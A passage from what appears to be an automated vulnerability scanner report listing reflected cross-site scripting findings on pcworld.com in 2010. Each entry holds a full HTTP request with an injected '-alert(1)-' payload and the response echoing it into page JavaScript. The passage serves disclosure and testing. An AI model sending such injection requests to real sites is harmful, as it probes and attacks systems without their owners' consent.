<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html91502'-alert(1)-'477a2da820e/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x2
...[SNIP]...

1.16. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c43ab'-alert(1)-'271b75ab08a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26ampc43ab'-alert(1)-'271b75ab08a;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C2620E7A72D1DDCEBCE396E4A43B583; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html/x26ampc43ab'-alert(1)-'271b75ab08a;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eT
...[SNIP]...

1.17. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb3ee'-alert(1)-'2085dd5c883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88&eb3ee'-alert(1)-'2085dd5c883=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A423733B2DC6B04E15F1F146F762805; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
mp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88&eb3ee'-alert(1)-'2085dd5c883=1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb1da'-alert(1)-'c77cdea635b was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a=1bb1da'-alert(1)-'c77cdea635b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:10:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a=1bb1da'-alert(1)-'c77cdea635b';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f912'-alert(1)-'b3debb63643 was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a888f912'-alert(1)-'b3debb63643 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4D19795D48A91C19743A5EE7995F7531; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a888f912'-alert(1)-'b3debb63643';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.20. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae4e'-alert(1)-'9a0126fc56e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/1ae4e'-alert(1)-'9a0126fc56e/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/1ae4e'-alert(1)-'9a0126fc56e/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp
...[SNIP]...

1.21. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea419'-alert(1)-'b51fcfff3a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.htmlea419'-alert(1)-'b51fcfff3a5/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1AAC872FDF7C9F343B0141870411E085; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.htmlea419'-alert(1)-'b51fcfff3a5/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3
...[SNIP]...

1.22. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb099'-alert(1)-'eb6a63c62cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458ebb099'-alert(1)-'eb6a63c62cf;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E3DF89D1801142FACE5C41B6E3DF863; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:38 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458ebb099'-alert(1)-'eb6a63c62cf;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eT
...[SNIP]...

1.23. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b08b7'-alert(1)-'01df5185cf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&b08b7'-alert(1)-'01df5185cf0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A5E1E007DA1F462049228ACF3BA5555; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
/x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&b08b7'-alert(1)-'01df5185cf0=1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 949da'-alert(1)-'4c9710189d5 was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday949da'-alert(1)-'4c9710189d5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday949da'-alert(1)-'4c9710189d5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.25. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,57/game_on.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee968'-alert(1)-'65de885f409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/ee968'-alert(1)-'65de885f409/game_on.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:45 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=543B882D6CF32FF06978052092BCB6D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ee968'-alert(1)-'65de885f409/game_on.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.26. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,57/game_on.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86f0a'-alert(1)-'a34caebd25c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,57/game_on.html86f0a'-alert(1)-'a34caebd25c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,57/game_on.html86f0a'-alert(1)-'a34caebd25c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.27. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,61/bizfeed.html

Issue detail

